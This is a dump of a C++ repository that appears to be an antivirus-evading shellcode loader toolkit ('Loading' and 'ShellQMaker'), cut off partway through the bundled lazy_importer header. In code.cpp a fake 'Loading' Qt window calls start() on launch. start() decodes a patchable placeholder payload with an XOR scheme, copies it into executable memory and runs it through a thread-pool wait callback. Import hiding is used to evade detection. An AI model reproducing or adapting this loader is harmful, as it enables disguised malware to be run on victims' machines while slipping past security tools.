├── Loading ├── Loading.sln ├── Loading │ ├── Loading.cpp │ ├── Loading.h │ ├── code.cpp │ ├── code.h │ ├── lazy_importer.hpp │ ├── main.cpp │ ├── moc │ │ └── moc_Loading.cpp │ ├── rcc │ │ └── qrc_Loading.cpp │ └── uic │ │ └── ui_Loading.h └── res │ └── Loading.ico ├── Loading_1.2 ├── Loading.sln ├── Loading │ ├── Loading.cpp │ ├── Loading.h │ ├── code.cpp │ ├── code.h │ ├── lazy_importer.hpp │ ├── main.cpp │ ├── moc │ │ └── moc_Loading.cpp │ ├── rcc │ │ └── qrc_Loading.cpp │ └── uic │ │ └── ui_Loading.h └── res │ └── Loading.ico ├── Readme ├── Result-01.png ├── Result-02.png ├── Result-03.png ├── Result-04.png ├── ShellQMaker-Files-001.png ├── shellQMaker-Instructions-001.png ├── shellQMaker-Instructions-002.png ├── shellQMaker-Instructions-003.png └── shellQMaker-Instructions-004.png ├── ShellQMaker ├── ShellQMaker.sln └── ShellQMaker │ ├── ShellQMaker.cpp │ ├── ShellQMaker.h │ ├── main.cpp │ └── main.h ├── readme.md └── readme_en.md /Loading/Loading.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 17 4 | VisualStudioVersion = 17.4.33110.190 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Loading", "Loading.vcxproj", "{C430F35E-F396-494F-B5AA-43D8BA1A42F1}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|x86 = Debug|x86 11 | Release|x86 = Release|x86 12 | EndGlobalSection 13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 14 | {C430F35E-F396-494F-B5AA-43D8BA1A42F1}.Debug|x86.ActiveCfg = Debug|Win32 15 | {C430F35E-F396-494F-B5AA-43D8BA1A42F1}.Debug|x86.Build.0 = Debug|Win32 16 | {C430F35E-F396-494F-B5AA-43D8BA1A42F1}.Release|x86.ActiveCfg = Release|Win32 17 | {C430F35E-F396-494F-B5AA-43D8BA1A42F1}.Release|x86.Build.0 = Release|Win32 18 | EndGlobalSection 19 | GlobalSection(SolutionProperties) = preSolution 20 | 
HideSolutionNode = FALSE 21 | EndGlobalSection 22 | GlobalSection(ExtensibilityGlobals) = postSolution 23 | SolutionGuid = {3FAB5FFE-9354-496A-9899-64C62FF2DB98} 24 | EndGlobalSection 25 | EndGlobal 26 | -------------------------------------------------------------------------------- /Loading/Loading/Loading.cpp: -------------------------------------------------------------------------------- 1 | #include "Loading.h" 2 | #include "code.h" 3 | 4 | Loading::Loading(QWidget *parent) 5 | : QMainWindow(parent) 6 | { 7 | ui.setupUi(this); 8 | start(); 9 | } 10 | 11 | Loading::~Loading() 12 | {} 13 | -------------------------------------------------------------------------------- /Loading/Loading/Loading.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include "ui_Loading.h" 5 | 6 | class Loading : public QMainWindow 7 | { 8 | Q_OBJECT 9 | 10 | public: 11 | Loading(QWidget *parent = nullptr); 12 | ~Loading(); 13 | 14 | private: 15 | Ui::LoadingClass ui; 16 | }; 17 | -------------------------------------------------------------------------------- /Loading/Loading/code.cpp: -------------------------------------------------------------------------------- 1 | #include "code.h" 2 | #include "lazy_importer.hpp" 3 | #include "winuser.h" 4 | 5 | void* MMcpy(void* dst, const void* src, size_t len) 6 | { 7 | char* ch_dst = (char*)dst; 8 | char* ch_src = (char*)src; 9 | if (NULL == ch_dst || NULL == ch_src) { 10 | return NULL; 11 | } 12 | 13 | void* rest = ch_dst; 14 | 15 | if (ch_dst <= ch_src || (char*)ch_dst >= (char*)ch_src + len) { 16 | while (len--) { 17 | *(char*)ch_dst = *(char*)ch_src; 18 | ch_dst = (char*)ch_dst + 1; 19 | ch_src = (char*)ch_src + 1; 20 | } 21 | } 22 | else { 23 | ch_src = (char*)ch_src + len - 1; 24 | ch_dst = (char*)ch_dst + len - 1; 25 | while (len--) { 26 | *(char*)ch_dst = *(char*)ch_src; 27 | ch_dst = (char*)ch_dst - 1; 28 | ch_src = (char*)ch_src - 1; 29 | } 30 | } 31 | return 
rest; 32 | } 33 | void start() 34 | { 35 | //char shellcode[DATA_SIZE] = { 0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,
0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,
0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41 }; 36 | char shellcode[DATA_SIZE] = 
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"; 37 | DWORD size = ((PDWORD)shellcode)[0];//size 38 | HANDLE event = CreateEvent(NULL, FALSE, TRUE, NULL); 39 | char* shellcodeAddress =(char*)(VirtualAlloc)(NULL, sizeof(shellcode), MEM_COMMIT, PAGE_EXECUTE_READWRITE); 40 | char* tmpptr = shellcode + sizeof(DWORD); 41 | for (int i = 0; i < size; i++) 42 | { 43 | tmpptr[i] = (tmpptr[i] - 1) ^ (i + 1); 44 | //tmpptr[i] = tmpptr[i]; 45 | } 46 | MMcpy(shellcodeAddress, tmpptr, sizeof(shellcode)); 47 | PTP_WAIT threadPoolWait = CreateThreadpoolWait((PTP_WAIT_CALLBACK)shellcodeAddress, NULL, NULL); 48 | SetThreadpoolWait(threadPoolWait, event, NULL); 49 | WaitForSingleObject(event, INFINITE); 50 | while (1) 51 | { 52 | Sleep(12000); 53 | } 54 | //return 0; 55 | } -------------------------------------------------------------------------------- /Loading/Loading/code.h: -------------------------------------------------------------------------------- 1 | 2 | #include 3 | #define DATA_SIZE 27136 4 | 5 | 6 | void 
start(); 7 | 8 | void run(void* buffer); 9 | -------------------------------------------------------------------------------- /Loading/Loading/lazy_importer.hpp: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright 2018-2022 Justas Masiulis 3 | * 4 | * Licensed under the Apache License, Version 2.0 (the "License"); 5 | * you may not use this file except in compliance with the License. 6 | * You may obtain a copy of the License at 7 | * 8 | * http://www.apache.org/licenses/LICENSE-2.0 9 | * 10 | * Unless required by applicable law or agreed to in writing, software 11 | * distributed under the License is distributed on an "AS IS" BASIS, 12 | * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 13 | * See the License for the specific language governing permissions and 14 | * limitations under the License. 15 | */ 16 | 17 | // === FAQ === documentation is available at https://github.com/JustasMasiulis/lazy_importer 18 | // * Code doesn't compile with errors about pointer conversion: 19 | // - Try using `nullptr` instead of `NULL` or call `get()` instead of using the overloaded operator() 20 | // * Lazy importer can't find the function I want: 21 | // - Double check that the module in which it's located in is actually loaded 22 | // - Try #define LAZY_IMPORTER_CASE_INSENSITIVE 23 | // This will start using case insensitive comparison globally 24 | // - Try #define LAZY_IMPORTER_RESOLVE_FORWARDED_EXPORTS 25 | // This will enable forwarded export resolution globally instead of needing explicit `forwarded()` calls 26 | 27 | #ifndef LAZY_IMPORTER_HPP 28 | #define LAZY_IMPORTER_HPP 29 | 30 | 31 | #define LI_FN(name) ::li::detail::lazy_function() 32 | 33 | #define LI_FN_DEF(name) ::li::detail::lazy_function() 34 | 35 | #define LI_MODULE(name) ::li::detail::lazy_module() 36 | 37 | #ifndef LAZY_IMPORTER_CPP_FORWARD 38 | #ifdef LAZY_IMPORTER_NO_CPP_FORWARD 39 | #define LAZY_IMPORTER_CPP_FORWARD(t, v) v 40 | 
#else 41 | #include 42 | #define LAZY_IMPORTER_CPP_FORWARD(t, v) std::forward( v ) 43 | #endif 44 | #endif 45 | 46 | #include 47 | 48 | #ifndef LAZY_IMPORTER_NO_FORCEINLINE 49 | #if defined(_MSC_VER) 50 | #define LAZY_IMPORTER_FORCEINLINE __forceinline 51 | #elif defined(__GNUC__) && __GNUC__ > 3 52 | #define LAZY_IMPORTER_FORCEINLINE inline __attribute__((__always_inline__)) 53 | #else 54 | #define LAZY_IMPORTER_FORCEINLINE inline 55 | #endif 56 | #else 57 | #define LAZY_IMPORTER_FORCEINLINE inline 58 | #endif 59 | 60 | 61 | #ifdef LAZY_IMPORTER_CASE_INSENSITIVE 62 | #define LAZY_IMPORTER_CASE_SENSITIVITY false 63 | #else 64 | #define LAZY_IMPORTER_CASE_SENSITIVITY true 65 | #endif 66 | 67 | #define LAZY_IMPORTER_STRINGIZE(x) #x 68 | #define LAZY_IMPORTER_STRINGIZE_EXPAND(x) LAZY_IMPORTER_STRINGIZE(x) 69 | 70 | #define LAZY_IMPORTER_KHASH(str) ::li::detail::khash(str, \ 71 | ::li::detail::khash_impl( __TIME__ __DATE__ LAZY_IMPORTER_STRINGIZE_EXPAND(__LINE__) LAZY_IMPORTER_STRINGIZE_EXPAND(__COUNTER__), 2166136261 )) 72 | 73 | namespace li { namespace detail { 74 | 75 | namespace win { 76 | 77 | struct LIST_ENTRY_T { 78 | const char* Flink; 79 | const char* Blink; 80 | }; 81 | 82 | struct UNICODE_STRING_T { 83 | unsigned short Length; 84 | unsigned short MaximumLength; 85 | wchar_t* Buffer; 86 | }; 87 | 88 | struct PEB_LDR_DATA_T { 89 | unsigned long Length; 90 | unsigned long Initialized; 91 | const char* SsHandle; 92 | LIST_ENTRY_T InLoadOrderModuleList; 93 | }; 94 | 95 | struct PEB_T { 96 | unsigned char Reserved1[2]; 97 | unsigned char BeingDebugged; 98 | unsigned char Reserved2[1]; 99 | const char* Reserved3[2]; 100 | PEB_LDR_DATA_T* Ldr; 101 | }; 102 | 103 | struct LDR_DATA_TABLE_ENTRY_T { 104 | LIST_ENTRY_T InLoadOrderLinks; 105 | LIST_ENTRY_T InMemoryOrderLinks; 106 | LIST_ENTRY_T InInitializationOrderLinks; 107 | const char* DllBase; 108 | const char* EntryPoint; 109 | union { 110 | unsigned long SizeOfImage; 111 | const char* _dummy; 112 | }; 113 | 
UNICODE_STRING_T FullDllName; 114 | UNICODE_STRING_T BaseDllName; 115 | 116 | LAZY_IMPORTER_FORCEINLINE const LDR_DATA_TABLE_ENTRY_T* 117 | load_order_next() const noexcept 118 | { 119 | return reinterpret_cast( 120 | InLoadOrderLinks.Flink); 121 | } 122 | }; 123 | 124 | struct IMAGE_DOS_HEADER { // DOS .EXE header 125 | unsigned short e_magic; // Magic number 126 | unsigned short e_cblp; // Bytes on last page of file 127 | unsigned short e_cp; // Pages in file 128 | unsigned short e_crlc; // Relocations 129 | unsigned short e_cparhdr; // Size of header in paragraphs 130 | unsigned short e_minalloc; // Minimum extra paragraphs needed 131 | unsigned short e_maxalloc; // Maximum extra paragraphs needed 132 | unsigned short e_ss; // Initial (relative) SS value 133 | unsigned short e_sp; // Initial SP value 134 | unsigned short e_csum; // Checksum 135 | unsigned short e_ip; // Initial IP value 136 | unsigned short e_cs; // Initial (relative) CS value 137 | unsigned short e_lfarlc; // File address of relocation table 138 | unsigned short e_ovno; // Overlay number 139 | unsigned short e_res[4]; // Reserved words 140 | unsigned short e_oemid; // OEM identifier (for e_oeminfo) 141 | unsigned short e_oeminfo; // OEM information; e_oemid specific 142 | unsigned short e_res2[10]; // Reserved words 143 | long e_lfanew; // File address of new exe header 144 | }; 145 | 146 | struct IMAGE_FILE_HEADER { 147 | unsigned short Machine; 148 | unsigned short NumberOfSections; 149 | unsigned long TimeDateStamp; 150 | unsigned long PointerToSymbolTable; 151 | unsigned long NumberOfSymbols; 152 | unsigned short SizeOfOptionalHeader; 153 | unsigned short Characteristics; 154 | }; 155 | 156 | struct IMAGE_EXPORT_DIRECTORY { 157 | unsigned long Characteristics; 158 | unsigned long TimeDateStamp; 159 | unsigned short MajorVersion; 160 | unsigned short MinorVersion; 161 | unsigned long Name; 162 | unsigned long Base; 163 | unsigned long NumberOfFunctions; 164 | unsigned long NumberOfNames; 165 
| unsigned long AddressOfFunctions; // RVA from base of image 166 | unsigned long AddressOfNames; // RVA from base of image 167 | unsigned long AddressOfNameOrdinals; // RVA from base of image 168 | }; 169 | 170 | struct IMAGE_DATA_DIRECTORY { 171 | unsigned long VirtualAddress; 172 | unsigned long Size; 173 | }; 174 | 175 | struct IMAGE_OPTIONAL_HEADER64 { 176 | unsigned short Magic; 177 | unsigned char MajorLinkerVersion; 178 | unsigned char MinorLinkerVersion; 179 | unsigned long SizeOfCode; 180 | unsigned long SizeOfInitializedData; 181 | unsigned long SizeOfUninitializedData; 182 | unsigned long AddressOfEntryPoint; 183 | unsigned long BaseOfCode; 184 | unsigned long long ImageBase; 185 | unsigned long SectionAlignment; 186 | unsigned long FileAlignment; 187 | unsigned short MajorOperatingSystemVersion; 188 | unsigned short MinorOperatingSystemVersion; 189 | unsigned short MajorImageVersion; 190 | unsigned short MinorImageVersion; 191 | unsigned short MajorSubsystemVersion; 192 | unsigned short MinorSubsystemVersion; 193 | unsigned long Win32VersionValue; 194 | unsigned long SizeOfImage; 195 | unsigned long SizeOfHeaders; 196 | unsigned long CheckSum; 197 | unsigned short Subsystem; 198 | unsigned short DllCharacteristics; 199 | unsigned long long SizeOfStackReserve; 200 | unsigned long long SizeOfStackCommit; 201 | unsigned long long SizeOfHeapReserve; 202 | unsigned long long SizeOfHeapCommit; 203 | unsigned long LoaderFlags; 204 | unsigned long NumberOfRvaAndSizes; 205 | IMAGE_DATA_DIRECTORY DataDirectory[16]; 206 | }; 207 | 208 | struct IMAGE_OPTIONAL_HEADER32 { 209 | unsigned short Magic; 210 | unsigned char MajorLinkerVersion; 211 | unsigned char MinorLinkerVersion; 212 | unsigned long SizeOfCode; 213 | unsigned long SizeOfInitializedData; 214 | unsigned long SizeOfUninitializedData; 215 | unsigned long AddressOfEntryPoint; 216 | unsigned long BaseOfCode; 217 | unsigned long BaseOfData; 218 | unsigned long ImageBase; 219 | unsigned long SectionAlignment; 
220 | unsigned long FileAlignment; 221 | unsigned short MajorOperatingSystemVersion; 222 | unsigned short MinorOperatingSystemVersion; 223 | unsigned short MajorImageVersion; 224 | unsigned short MinorImageVersion; 225 | unsigned short MajorSubsystemVersion; 226 | unsigned short MinorSubsystemVersion; 227 | unsigned long Win32VersionValue; 228 | unsigned long SizeOfImage; 229 | unsigned long SizeOfHeaders; 230 | unsigned long CheckSum; 231 | unsigned short Subsystem; 232 | unsigned short DllCharacteristics; 233 | unsigned long SizeOfStackReserve; 234 | unsigned long SizeOfStackCommit; 235 | unsigned long SizeOfHeapReserve; 236 | unsigned long SizeOfHeapCommit; 237 | unsigned long LoaderFlags; 238 | unsigned long NumberOfRvaAndSizes; 239 | IMAGE_DATA_DIRECTORY DataDirectory[16]; 240 | }; 241 | 242 | struct IMAGE_NT_HEADERS { 243 | unsigned long Signature; 244 | IMAGE_FILE_HEADER FileHeader; 245 | #ifdef _WIN64 246 | IMAGE_OPTIONAL_HEADER64 OptionalHeader; 247 | #else 248 | IMAGE_OPTIONAL_HEADER32 OptionalHeader; 249 | #endif 250 | }; 251 | 252 | } // namespace win 253 | 254 | struct forwarded_hashes { 255 | unsigned module_hash; 256 | unsigned function_hash; 257 | }; 258 | 259 | // 64 bit integer where 32 bits are used for the hash offset 260 | // and remaining 32 bits are used for the hash computed using it 261 | using offset_hash_pair = unsigned long long; 262 | 263 | LAZY_IMPORTER_FORCEINLINE constexpr unsigned get_hash(offset_hash_pair pair) noexcept { return ( pair & 0xFFFFFFFF ); } 264 | 265 | LAZY_IMPORTER_FORCEINLINE constexpr unsigned get_offset(offset_hash_pair pair) noexcept { return ( pair >> 32 ); } 266 | 267 | template 268 | LAZY_IMPORTER_FORCEINLINE constexpr unsigned hash_single(unsigned value, char c) noexcept 269 | { 270 | return static_cast( 271 | (value ^ ((!CaseSensitive && c >= 'A' && c <= 'Z') ? 
(c | (1 << 5)) : c)) * 272 | static_cast(16777619)); 273 | } 274 | 275 | LAZY_IMPORTER_FORCEINLINE constexpr unsigned 276 | khash_impl(const char* str, unsigned value) noexcept 277 | { 278 | return (*str ? khash_impl(str + 1, hash_single(value, *str)) : value); 279 | } 280 | 281 | LAZY_IMPORTER_FORCEINLINE constexpr offset_hash_pair khash( 282 | const char* str, unsigned offset) noexcept 283 | { 284 | return ((offset_hash_pair{ offset } << 32) | khash_impl(str, offset)); 285 | } 286 | 287 | template 288 | LAZY_IMPORTER_FORCEINLINE unsigned hash(const CharT* str, unsigned offset) noexcept 289 | { 290 | unsigned value = offset; 291 | 292 | for(;;) { 293 | char c = *str++; 294 | if(!c) 295 | return value; 296 | value = hash_single(value, c); 297 | } 298 | } 299 | 300 | LAZY_IMPORTER_FORCEINLINE unsigned hash( 301 | const win::UNICODE_STRING_T& str, unsigned offset) noexcept 302 | { 303 | auto first = str.Buffer; 304 | const auto last = first + (str.Length / sizeof(wchar_t)); 305 | auto value = offset; 306 | for(; first != last; ++first) 307 | value = hash_single(value, static_cast(*first)); 308 | 309 | return value; 310 | } 311 | 312 | LAZY_IMPORTER_FORCEINLINE forwarded_hashes hash_forwarded( 313 | const char* str, unsigned offset) noexcept 314 | { 315 | forwarded_hashes res{ offset, offset }; 316 | 317 | for(; *str != '.'; ++str) 318 | res.module_hash = hash_single(res.module_hash, *str); 319 | 320 | ++str; 321 | 322 | for(; *str; ++str) 323 | res.function_hash = hash_single(res.function_hash, *str); 324 | 325 | return res; 326 | } 327 | 328 | // some helper functions 329 | LAZY_IMPORTER_FORCEINLINE const win::PEB_T* peb() noexcept 330 | { 331 | #if defined(_M_X64) || defined(__amd64__) 332 | return reinterpret_cast(__readgsqword(0x60)); 333 | #elif defined(_M_IX86) || defined(__i386__) 334 | return reinterpret_cast(__readfsdword(0x30)); 335 | #elif defined(_M_ARM) || defined(__arm__) 336 | return *reinterpret_cast(_MoveFromCoprocessor(15, 0, 13, 0, 2) + 0x30); 337 
| #elif defined(_M_ARM64) || defined(__aarch64__) 338 | return *reinterpret_cast(__getReg(18) + 0x60); 339 | #elif defined(_M_IA64) || defined(__ia64__) 340 | return *reinterpret_cast(static_cast(_rdteb()) + 0x60); 341 | #else 342 | #error Unsupported platform. Open an issue and I'll probably add support. 343 | #endif 344 | } 345 | 346 | LAZY_IMPORTER_FORCEINLINE const win::PEB_LDR_DATA_T* ldr() 347 | { 348 | return reinterpret_cast(peb()->Ldr); 349 | } 350 | 351 | LAZY_IMPORTER_FORCEINLINE const win::IMAGE_NT_HEADERS* nt_headers( 352 | const char* base) noexcept 353 | { 354 | return reinterpret_cast( 355 | base + reinterpret_cast(base)->e_lfanew); 356 | } 357 | 358 | LAZY_IMPORTER_FORCEINLINE const win::IMAGE_EXPORT_DIRECTORY* image_export_dir( 359 | const char* base) noexcept 360 | { 361 | return reinterpret_cast( 362 | base + nt_headers(base)->OptionalHeader.DataDirectory->VirtualAddress); 363 | } 364 | 365 | LAZY_IMPORTER_FORCEINLINE const win::LDR_DATA_TABLE_ENTRY_T* ldr_data_entry() noexcept 366 | { 367 | return reinterpret_cast( 368 | ldr()->InLoadOrderModuleList.Flink); 369 | } 370 | 371 | struct exports_directory { 372 | const char* _base; 373 | const win::IMAGE_EXPORT_DIRECTORY* _ied; 374 | unsigned long _ied_size; 375 | 376 | public: 377 | using size_type = unsigned long; 378 | 379 | LAZY_IMPORTER_FORCEINLINE 380 | exports_directory(const char* base) noexcept : _base(base) 381 | { 382 | const auto ied_data_dir = nt_headers(base)->OptionalHeader.DataDirectory[0]; 383 | _ied = reinterpret_cast( 384 | base + ied_data_dir.VirtualAddress); 385 | _ied_size = ied_data_dir.Size; 386 | } 387 | 388 | LAZY_IMPORTER_FORCEINLINE explicit operator bool() const noexcept 389 | { 390 | return reinterpret_cast(_ied) != _base; 391 | } 392 | 393 | LAZY_IMPORTER_FORCEINLINE size_type size() const noexcept 394 | { 395 | return _ied->NumberOfNames; 396 | } 397 | 398 | LAZY_IMPORTER_FORCEINLINE const char* base() const noexcept { return _base; } 399 | LAZY_IMPORTER_FORCEINLINE 
